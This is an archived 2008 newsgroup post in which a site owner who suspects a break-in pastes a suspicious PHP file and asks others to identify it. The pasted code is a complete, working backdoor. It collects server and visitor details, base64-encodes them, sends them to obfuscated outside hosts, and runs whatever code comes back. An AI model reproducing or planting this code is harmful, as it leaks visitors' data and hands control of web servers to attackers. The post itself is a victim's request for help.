I've been hacked, help!
- From: "errr" <playa@xxxxxx>
- Date: Wed, 30 Apr 2008 00:12:26 GMT
I found a very suspicious file and if someone can confirm either way for me
that would be great! Also, any ideas how they put it there?
Thanks for help!
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ?
$_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ?
$_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ?
$_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ?
$_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ?
$_SERVER["QUERY_STRING"] :
$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ?
$_SERVER["HTTP_REFERER"] :
$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ?
$_SERVER["HTTP_USER_AGENT"] :
$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ?
$_SERVER["REMOTE_ADDR"] :
$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ?
$_SERVER["SCRIPT_FILENAME"] :
$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ?
$_SERVER["HTTP_ACCEPT_LANGUAGE"] :
$HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);
if
((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str)));
else if
(include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str));
else
eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str));
?>
.
- Follow-Ups:
- Re: I've been hacked, help!
- From: Jerry Stuckle
- Re: I've been hacked, help!
- From: J.O. Aho
- Re: I've been hacked, help!
- Prev by Date: Re: Any idea how to do it right?
- Next by Date: Re: Any idea how to do it right?
- Previous by thread: Any idea how to do it right?
- Next by thread: Re: I've been hacked, help!
- Index(es):
